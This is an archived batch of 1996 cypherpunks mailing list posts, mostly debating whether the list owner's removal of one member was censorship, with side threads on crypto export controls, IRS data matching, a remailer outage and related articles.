> censorship.

I agree with your objections, probably because you're attacking straw 
men.

> Certainly Disney owned WABC and was within its rights to censor it.
> Likewise John Gilmore is within his rights to destroy his own
> credibility and to expose his own hypocricy.

Yes, this gets to my point. Private censorship tells more about the 
censor than about the censored. In this case, John acted properly, and 
his credibility has only been enhanced. You are of course free to rant 
and rave about his hypocrisy, but expecially since you'll always be able 
to post to the list, at least under a nym (the only thing he's prevented 
is your reading the list under your own name), you're only proving 
yourself to be an idiot.

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMn+0UioZzwIn1bdtAQE+DwF/YHGRdPpQ3JqotsUWw303aYCmKn7d9il1
4sCKaEIMy7NHT1uvRR1DL8oBgZGsVUwH
=acPs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 5 Nov 1996 15:31:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: FOR_tun
Message-ID: <1.5.4.32.19961105220703.00683cfc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>I didn't see mention of the long article on crypto, export issues, 
>RSADSI, Bidzos, the NSA, etc., in the current issue of "Fortune" 
>magazine, 11 November.

----------

   "Techno-Hero or Public Enemy?"

   James Bidzos of RSA Data Security wants to go global
   with a potent shield against computer break-ins. Uncle
   Sam's most secretive spy agency wants to stop him. At
   stake is the right to privacy and the health of the
   U.S. software industry.

   -----

   http://jya.com/fortun.txt  (32 kb)

   FOR_tun





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Tue, 5 Nov 1996 14:38:54 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Censorship on cypherpunks [RANT]
Message-ID: <2.2.32.19961105223802.0068e2cc@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:20 AM 11/4/96 -0800, you wrote:
:
:So if c-punks is really "private", how does it decide (arbitrarily?) who to
include
:and who to reject?

Since it IS private, the owner has to justify NOTHING, vis-a-vis the list.
We _choose_ to supplicate to join; we are _allowed_ to join (or not allowed)
by the owner's grace; we may always _choose_ to unsubscrive [sic]; if we do
it correctly, we are off the list.

Let me repeat, the onus is NOT on the owner to justify the use of his property.
Cordially,

Alec                   

PGP Fingerprint:

pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 5 Nov 1996 14:40:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is not on cypherpunks any more [VULIS]
Message-ID: <199611052238.RAA10139@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Igor Chudov @ home wrote:
> 
> I guess libertarian philosophy permits operating a private mailing
> list and imposing whatever rules the host deems necessary to invent.

Clearly.

And contractural principles suggest that there should be transparency in 
those rules.

> The question is, can this ist be called a free medium for exchange of
> ideas, or not. My answer is no.

I say you're wrong. Vulis has been denied nothing but the dignity of 
reading the list under his own name. He still has freedom to read under 
a pseudonym, and he still has freedom to post under his own name, or any 
other.

> Moderated forums might create some utility (by saving the time of
> their participants, for example), but they should identify themselves
> as such.

Such as by notifying the list that exactly one particularly obnoxious 
member has been kicked off, and allowing *unlimited* discussion on the 
list about the impact of doing so? I think this is working.

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMn/BzSoZzwIn1bdtAQGk+wGAgv2SrJzetHEzgs9DxahGvB8ReGWi8mDB
aEGj8o8aW2DNGrDSx4f8DBDS4a8605Tc
=oQeM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 5 Nov 1996 17:53:22 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: Re: just what we #$%^&* needed from big brother....
Message-ID: <19961106015118734.AAA249@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 04 Nov 96 19:15:39 +0000, attila@primenet.com wrote:

>Welcome to 1984+  what else with useless and illegally constituted
>bureaucrats add to their total infringement of every facet of our life. 
>
>-.NEW SYSTEM LINKS LENDERS, IRS

>-.information for the previous couple of years.  If the cross-check turns up a
>-.more than $10,000 discrepancy between the earnings claimed on the application
>-.and those declared for tax purposes, the IRS has the option of pursuing the

This isn't actually the end of the world.  In fact we should be applauding
their efforts to make their abominable system more efficient.  Whether it
should be scraped is another issue.   In other words, as long as they are
going to do it, they might as well do it right.  

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Tue, 5 Nov 1996 09:38:55 -0800 (PST)
To: hallam@ai.mit.edu
Subject: [NOISE] [philosophypunks] Re: Dr. Vulis
In-Reply-To: <9611051635.AA05667@etna.ai.mit.edu>
Message-ID: <199611051738.SAA08932@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Dr. Phillip Hallam-Baker <hallam@ai.mit.edu> wrote:
>
> And of course this is not an action that can be strictly justified in
> terms of absolute rights which many are fond of prating on about.
> Rights are limited, as Mills observes they are a product of law. Society
> finds it necessary to enact laws to protect rights. Dmitri's posts were
> affecting other people's right to speak. There is thus the traditional
> liberal conflict, that of having to infringe rights to protect them.


to which I, Bryce <bryce@c2.net> replied:
>
> Dear Sir:  I humbly put it to you that the above reflects a 
> misunderstanding about the libertarian conception of "absolute
> rights".  I personally do _not_ subscribe to said theory, but 
> I try to understand a thing correctly before criticizing it in 
> public.


to which he, <hallam@ai.mit.edu> wrote:
> 
> Given that the only recognised philosopher to take the libertarian
> position is Nozdic and he has semi-recanted I think it perfectly
> reasonable to base the libertarian position on the views of 
> people calling themselves libertarians.


Okay.  Normally I would rather argue about viewpoints expressed
in written opinions by writers like pre-communitarian Nozick, 
Ayn Rand, David Friedman and so forth than about difficult-to-
pinpoint "views of people calling themselves libertarians", but
in this case it will make little difference to my argument,
which is that your article quoted at the beginning of this
message reflects a misunderstanding of those views.


> If you don't ascribe to "absolute rights" based in natural law
> then it sounds as if you accept that rights are derived
> from prior principles. If you accept that then you are a
> simply taking the traditional liberal position.


Hm.  This is as may be, but it is tangential to my purpose in
publically calling you on your (presumably innocent) 
misrepresentation.


<snip on Hallam-Baker on Mills on "'absolute' rights">


Sure, I agree with you that Mills doesn't start with rights as
an assumption, but rather argues for them from prior
assumptions.  When I said that Mills argues for "absolute 
('unbalanced')" rights, I meant that he argues for individual
rights with (almost) no exceptions, in constrast to your
your assertion that "the main theory it advances is of the 
*balance* between the rights of communities and the rights of 
individuals.".  I doubt very much that Mills _ever_ used the
phrase or the concept of "rights of communities" and I know
that the main theory that _On_Liberty_ advances is the (almost)
total sovereignty of individual rights.  (I see now that 
I shouldn't have called Mills' conception of rights "absolute",
because of the existence of that "almost" there...)


But this, too, is tangential to my point...


> Mill was not an anarchist, he was a classic liberal utilitarian.
> Its rather ironic that nobody on the list has recognised that I
> advance a classical utilitarian position and that if I quote Mill
> I'm quoting a principle authority.


Hm.  I was taught that Mills recanted Benthamism and became a
vigorous philosophical adversary of it before writing _On_
_Liberty_.  Are you counting _On_Liberty_-era Mills as some 
kind of "neo-Benthamite utilitarian" or is one of us mistaken 
on his self-identification?


But this, too, is tangential to my point, which I will get
around to now.


You wrote, in the article that spawned this thread:

> And of course this is not an action that can be strictly justified in
> terms of absolute rights which many are fond of prating on about.


Now I must strongly assert that this _is_ an action that can be
strictly justified in terms of absolute rights as understood
by people who call themselves libertarians.  I don't believe 
that Dr. Vulis _should_ have been banned from cypherpunks, and 
I don't believe in absolute rights as understood by people who
call themselves libertarians, but I must state that your 
assertion quoted above reflects a profound misunderstanding of
that viewpoint.


The idea of absolute rights as understood by libertarians
states that no-one is justified in exercising "the use of
force" against another person unless in self-defense against
similar "use of force" from that person.  [Note:  "the use of
force" is in quotes because it has a particular meaning in this
context which is essential to appreciating the theory.  The
meaning of "the use of force" in this theory is:  "One of: a.
performing physical violence upon the subject, b. threatening
to perform physical violence upon the subject, c. stealing the
subject's property.".]


Now if you are able to read and comprehend the above paragraph
then you must find it obvious that this theory does not forbid
John Gilmore from banning Dr. Vulis from cypherpunks.  If you
are able to read and comprehend the above paragraph and _also_
understand its deficiencies and begged questions, then more
power to you, but you must still admit that the theory, as
understood by people who call themselves libertarians, fully
permits John Gilmore to ban Dr. V.


I look forward to your reply.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMn97m0jbHy8sKZitAQGiPgL9GJqxboWmhOoMheYpPZTgPyRB6eMbf4J6
q2EmtQPoQB8HwhFLR4AV9C9TgZ4wb2lH2gCCDjqaUi0I+0Kc5AMUBfXvmh3tU/Q6
BkztyVtRQsM/IJ0ruLItYqJmrRTAmDou
=QQJG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 5 Nov 1996 09:59:25 -0800 (PST)
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Dr. Vulis
In-Reply-To: <Pine.OSF.3.91.961104212605.8774A-100000@gaston.tenet.edu>
Message-ID: <327F807E.500F9F30@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Dan Harmon wrote:
> 
> What is the story on this or is it more ravings?
> 
> Dan
> 
> On Mon, 4 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > frantz@netcom.com (Bill Frantz) writes:
> > > [John Gilmore]  has said to Dr.
> > > Vulis, "You are no longer a member of the cypherpunks community."
> >
> > I recall we've been through this over a year ago, when I saw an announcement
> > of a cypherpunks physical meeting where someone was excluded for his political
> > views, and I said that I don't consider myself a cypherpunk. I'm glad that
> > John and Bill, the auhorities on cypherpunk membership, finally concur.


I think he is referring to the explicit and public non-invite of Jim
Bell to a cypherpunks meeting, due to some of Jim Bell's Assination
Politics posts.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 5 Nov 1996 23:18:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: "high noon on the electronic frontier"
Message-ID: <199611060312.TAA06372@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



a neat new book that's a collection of some of the more
interesting essays on cyberspace called "high noon
on the electronic frontier" is now in bookstores, and
I highly recommend it. the editor Peter Ludlow has
a good eye and aesthetic sense for exactly the more
influential essays that have been written and
are circulating. the list of authors/contributors
is a real Who's Who in cyberspace:

Barlow, Stallman, Kapor, Godwin, Denning, Zimmermann, Chaum, Rheingold, 
Sterling, etc.

good articles by Dibbell, Levy, DeWitt, etc.

but unfortunately Markoff is conspicuously absent. maybe he
wanted too much money for his writing <g>

TCMay is well represented with several essays in a section on
"encryption, privacy, and crypto-anarchism". 3 essays,
Crypto Anarchist Manifesto, Intro to Blacknet, and
BlackNet worries.

I was curious about TCMay's essay on Blacknet, though, that
mentions a mysterious "X" who he credits as raising many
of the issues surrounding Blacknet on the cpunk mailing list
in Feb 1994. Ludlow states in a footnote TCMay "elided
references to interlocutors". I wonder about the identity
of the mysterious "X" and whether he/she is still posting
to the list. does anyone know who he/she is? 

I was thinking it would be interesting to see whether 
he/she still feels the same about Blacknet and/or get a new 
conversation going about the subject with the insight that 
time can bring.

I wonder why TCMay found it important to elide "X"'s identity-- 
perhaps "X" was one of his tentacles? (hee, hee) 

anyway I highly recommend this volume!! after reading this
the public will get a far better idea about what cyberspace
is about and what it means. a great coverage of all the
key issues.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 5 Nov 1996 23:17:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: BUR_ke
Message-ID: <v02140b03aea5aa6bc464@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


December's Internet World contains a good article by futurist James Burke
('Connections', and 'The Day the Universe Changed') on the societal impact
of the Net.  He discusses the international legal challenge of the Net,
privacy/anonymity, its effect on copyright and publishing, and worldwide
intellectual growth.


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

                          Hacker Opportunities
                        (Let's Make Lots Of Money)

I've got the brains, you've got the tricks
Let's make lots of money
You've got the code, I've got the hooks
Let's make lots of ...

I've had enough of scheming and messing `round with jerks
My crypto code's compiled, I'm afraid it doesn't work
I'm looking for a partner, someone who gets things fixed
Ask yourself this question: do you want to be rich?

I've got the hacks, you've got the keys
Let's make lots of money
You've got the code, I've got the hooks
Let's make lots of money

You can tell I'm educated, I studied at CalTech
Doctored in mathematics, I could've been set
I can program a computer, choose the perfect time
If you've got the inclination, I have got the crime

Ooooh, there's a lot of opportunities
If you know when to take them, you know
There's a lot of opportunities
If there aren't, you can make them (Make or break them)

I've got the brains, you've got the tricks
Let's make lots of money
Let's make lots of ...

You can see I'm single-minded, I know what I could be
How do you feel about it? Come, take a walk with me
I'm looking for a partner regardless of expense
Think about it seriously, you know it makes sense

Let's (Got the brains)
Make (Got the tricks)
Let's make lots of money (Money)
Let's (You've got the code)
Make (I've got the hacks)
Let's make lots of money (Money)
I've got the brains (Got the hooks)
You've got the code (Got the keys)
Let's make lots of money (Money)
Money! 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 5 Nov 1996 23:18:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: list noise: a novel suggestion
Message-ID: <199611060322.TAA14388@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I read rants about the list noise on this list so much
that it seems quite comical. it seems that everything
else has been tried, I thought I would suggest something
radically different.

I propose that no one talk about the noise on the list,
on the list. pretend it doesn't exist. consider it
like the weather: something that complaining about can do
nothing about.

the long history of this list proves that virtually,
absolutely nothing can be done to improve the signal-to-noise ratio on
the list. therefore, talking about it is a waste of time
and only makes people excited and irritable.

the only solution to the noise on the list is to unsubscribe.
if you don't like the list as it stands, don't subscribe.
the list is as it is, and historical precedent proves that
it has its own personality and flow that can't be rerouted
despite everyone's best intentions.

the best solution to list noise is to post on subjects you
want to read about. write things that you would like to read
had you not written them. simply complaining about the list contents
is like showing up at a potluck with empty hands and griping
that there's nothing good to eat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 5 Nov 1996 16:28:16 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [NOISE] Censorship of Dr. Vulius
In-Reply-To: <6eBwwD8w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961105192617.27527A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> I won, but you misspelled my name. Yes, John Gilmore has complete destroyed
> his credibility together with whatever goodwill I personally had toward him
> - a pity.

Oh, shut up and go away.
No one wants to hear from you anymore.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Tue, 5 Nov 1996 16:49:27 -0800 (PST)
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: British Telecom merger with MCI
In-Reply-To: <Pine.SUN.3.91.961105090137.5329A-100000@tipper.oit.unc.edu>
Message-ID: <199611060045.TAA10751@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero sez:
> 
> On Mon, 4 Nov 1996, Adam Shostack wrote:
> > 
> > Phil Karn failed to get an export license for 3des for foriegn offices
> > of Qualcomm, staffed by Americans.  See
> > www.eff.org/pub/Crypto/ITAR_export/nsa_3des_export_denial_0396.letter 
> 
> That's unusual- certainly for the bigger companies

It is far worse. Every time Qualcomm wishes to send a bug fix to
their Hong Kong switch, they must go through the entire song&dance
re: NSA/Commerce/etc.

Clearly harassment of The Enemy by Big Brother.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Tue, 5 Nov 1996 23:17:06 -0800 (PST)
To: elam@art.net (Lile Elam)
Subject: Re: black high heal shoes?
In-Reply-To: <199611050102.RAA27424@art.net>
Message-ID: <199611060400.UAA23832@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


I had yet another strange dream recently:

Clinton wearing black and white shiny vinyl high
heel shoes, and nothing else but a transparent
plastic raincoat. 

Embroided on the back of the clear plastic raincoat
is the bar code for the RSA algorithm. 

He is walking around the RSA Data Security Conference
with the outfit on, trying to hug and kiss the attendees,
but they all ignore and make fun of him!

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Nov 1996 18:19:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Exon's Seat Lost
Message-ID: <3.0b36.32.19961105212020.0073e520@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Exon's seat goes to Republicans (according to ABC).  CDA probably not involved.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Nov 1996 23:00:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Censorship of Dr. Vulius
In-Reply-To: <2.2.32.19961105063515.006c9fa4@gonzo.wolfenet.com>
Message-ID: <kZaywD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> writes:
> I don't think anyone has argued that the owner of the list doesn't have the
> right to remove people from it.  However, simply because he has the right to
> doesn't mean he should, and it also doesn't mean other members can't or
> shouldn't argue that he made a bad decision (unless, of course, the dissentin
> members are removed as well.)  Many, if not most, members believe the list
> should be run in a non-authoritarian manner (whoever argued that the term
> authoritarian applies only to governments is wrong.  the difference is a pers
> has the right to act in an authoritarian manner over his own property whereas
> a government doesn't have that right over it's citizens.  Again, however,
> having
> the right doesn't necessarily make it "okay").

I wholeheartedly concur. I happen to own a lot of books. I disagree with a lot
that's said in those books. I have the right to burn my books, but I don't. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 5 Nov 1996 23:42:51 -0800 (PST)
To: "Adamsc" <cypherpunks@toad.com>
Subject: Re: just what we #$%^&* needed from big brother....
Message-ID: <19961106055019062.AAA228@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Nov 1996 05:41:52 +0000 (GMT), attila wrote:

>> >Welcome to 1984+  what else with useless and illegally constituted
>> >bureaucrats add to their total infringement of every facet of our life. 

>> >-.NEW SYSTEM LINKS LENDERS, IRS

>> >-.information for the previous couple of years.  If the cross-check turns up a
>> >-.more than $10,000 discrepancy between the earnings claimed on the application
>> >-.and those declared for tax purposes, the IRS has the option of pursuing the
>> 
>> This isn't actually the end of the world.  In fact we should be applauding
>> their efforts to make their abominable system more efficient.  Whether it
>> should be scraped is another issue.   In other words, as long as they are
>> going to do it, they might as well do it right.  
>> 
>	my point is more towards: "...here goes another direct batch of
>    information directly into the federal computers --home location and
>    the link between real and 'imagined' income which immediately opens
>    the door for the IRS CID to start a tax-fraud investigation which
>    quickly leads to liens on your property, etc. while they audit the
>    living life out of you.  just one more piece, a major one at that, in
>    the national databank ready to persecute you....

Yes.  I was just trying to point out that as long as they are going to do
something, it's refreshing to see that they do it right.  Whether they should
be doing it at all is an entirely different matter and I have little doubt
that most of the list subscribers believe, as I do, that there should be some
major reforms.

Still, government incompetency is rather frustrating and helps inspire
cynicism.s

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 5 Nov 1996 23:07:00 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <Pine.SUN.3.91.961105091624.9423C-100000@crl.crl.com>
Message-ID: <328029BC.559B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> On Mon, 4 Nov 1996, Dale Thorn wrote:
> > A more practical and realistic example might be if Dale was
> > living in an apartment, and Dale's mother walked out to the
> > garage to get into her car, and the next-door neighbor started
> > calling her the most vile and foul things...
> > This is far more realistic than your example, since the
> > immediate neighborhoods where these situations develop are a
> > better model for cypherpunks than the inside of one
> > individual's home...

> I disagree.  This IS inside someone's home--both metaphorically
> and in reality.  John has graciously provided us with a venue for
> our never-ending Cypherpunk salon.  I think my example of an
> inappropriate guest in Dale's mom's livingroom is exactly on
> point.  Just for the record, I would appreciate it if Dale would
> address my hypothetical, just in case other readers find it as
> cogent as do I.

My computer and my access to cypherpunks is not inside of anyone's home.  One could
argue that all speech originates and/or is controlled anywhere, which is not the
point here.  Here, John has opened up whatever computer hardware for an essentially
public forum (I could detail the process of subscribing for you in intimate detail
and with all of its shades of meaning to demonstrate that it is perceived by a very
large segment of the subscribers as public), and has taken action to oust someone.

Now, don't you think it odd that if people really perceived this forum to be "really
private", that they would so strongly object to this ousting, particularly of the
person in question, who is not even liked by these objectors?

You can argue until doomsday the "privacy of home" issue, but I'd suggest to you that
a possible way to settle this in the minds of that large segment of participants who
disagree with you would be for John to make it more visibly clear on this forum that
the forum is his private child, and he can do whatever he darn well pleases with it.
Of course, what you're suggesting (subtly) is that one of the things John can darn
well do is keep silent, and continue to do as he pleases, which makes me wonder
about you.  If you really agree with the ousting, I don't understand why you're
arguing so hard for the "private home" issue; would you want to see a world someday
where all Internet communications are "controlled" by "private" individuals at "home"?
If you think about that for awhile, you'll at least understand what I'm getting at.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 5 Nov 1996 23:00:24 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: IRS Subscribed to Cypherpunks
In-Reply-To: <3.0b36.32.19961105070826.0070f470@panix.com>
Message-ID: <32802F79.242D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> Got the following bounce.  The Cc: was to a real address.
> >Date: Tue, 5 Nov 1996 05:24:21 -0500
> >From: Administrator@ccmail.irs.gov (Administrator)
> >Subject: Message not deliverable
> >To: Duncan Frissell <frissell@panix.com>
> >Cc: XXXXXXXXX (Administrator)
> >Content-Description: cc:Mail note part

> >At 04:45 AM 11/4/96 -0800, Declan McCullagh wrote:
> >>Libertarianism is not incompatible with strict regulations, as long as
> >>the rules violate nobody's rights.

> >Obviously many voluntary religious organizations have quite strict rules
> >for their members and are compatible with libertarianism.  Government
> >monopoly regulations that cannot be opted out of are not compatible with
> >libertarianism.  Instead of using the loaded term "regulations' it might be
> >better to call things like the rules of the cypherpunk's list "club rules"
> >or protocols.

Could be several things.  The IRS has (as of my visit in early 1996, anyway) adopted
the "hitman" technique of auditing, with specific per-hour $ goals, like traffic cops.

I'd guess at three things here.  1) Anyone hawking a product or engaging in barter, etc.
who is not paying the maximum tax, and  2) Studying certain aspects of net behavior or
usage for tax purposes, and  3) Trolling for fraud.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Tue, 5 Nov 1996 23:13:09 -0800 (PST)
To: jgrasty@gate.net
Subject: Re: WinSock Remailer Down
In-Reply-To: <199611060451.XAA351660@osceola.gate.net>
Message-ID: <199611060709.XAA07329@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I'd like to thank Sameer at C2NET who has hosted the WinSock Remailer
> during its painful birth and childhood.  I now need time to grow the
> remailer into adulthood (read Windows NT and 95), so that remailers
> can spread widely.
> 

	Thanks. =) 

	I personally think that Joey's Winsock-style remailers are the
way to go. It offloads the remailing work from the mail server, so
that anyone with a PC can have direct contorl over the remailer's most
intensive resources without making their ISPs mail server overloaded
or settingup a fulltime net site.

-- 
Sameer Parekh					Voice:   510-986-8770
C2Net						FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 5 Nov 1996 23:08:12 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Censorship on cypherpunks
In-Reply-To: <mqawwD6w165w@bwalk.dm.com>
Message-ID: <199611060510.XAA11348@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


>[This was sent directly to me, but apparently cc's to c-punks as well]
>Declan McCullagh <declan@eff.org> writes:
>>Libertarianism is not incompatible with strict regulations, as long as
>>the rules violate nobody's rights.
>Let's not confuse strict regulation with arbitrary and capricious plug-pulling.

    Let's also not confuse "capricious plug-pulling" with _daring_ the OWNER
of the machine the list is running on, and THE GUY WHO RUNS THE LIST to kick
your sorry racist ass off the list. He called your bluff, and any day now,
I expect him to prevent you from even posting in your own name. Not that that
will stop you.

    Like an parasite, you will infest any host you can find through any
possible vector. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Craft <jsi@idiom.com>
Date: Tue, 5 Nov 1996 23:18:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: HAPPY GUY FAWKES DAY!
In-Reply-To: <Pine.SUN.3.91.961105123056.18719A-100000@crl.crl.com>
Message-ID: <199611060718.XAA11364@idiom.com>
MIME-Version: 1.0
Content-Type: text


> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On this day in 1605 the Gunpowder Plot was foiled.  Guy Fawkes
> and his compatriots had intended to blow up Parliment.
> 
> The English celebrate it because Guy Fawkes failed.
> 
> I celebrate it because he tried.  :-)

A terrorist!!!   Call the police!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Tue, 5 Nov 1996 23:08:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: WinSock Remailer Down
Message-ID: <199611060451.XAA351660@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Y'all:

Effective immediately, winsock@c2.org is down until I find a new home
for it.  The account expired today, so it is an opportune time to find
a new location.  It will probably end up at Cyberpass, as soon as I 
have time to read the User Agreement from Hell (tm).  I expect to have
it back up at a different location in less than a week.

I'd like to thank Sameer at C2NET who has hosted the WinSock Remailer
during its painful birth and childhood.  I now need time to grow the
remailer into adulthood (read Windows NT and 95), so that remailers 
can spread widely.

Regards,

Joey Grasty
WinSock Remailer Operator


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMoAY38ODO2V89BZZAQH2lAL+ITKvy9e8WB+66sQXwFqOatoV6SHYqY7Q
mcWad9UE43bqnHA10YJiCKqe/vfhEbpNgh9hB5JIn9bVkiWCvIDtl8tIzkHyvo9q
2l6xwMx0pwaN4SmfPBkn/0FLagT6pvdp
=L3Iq
-----END PGP SIGNATURE-----

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
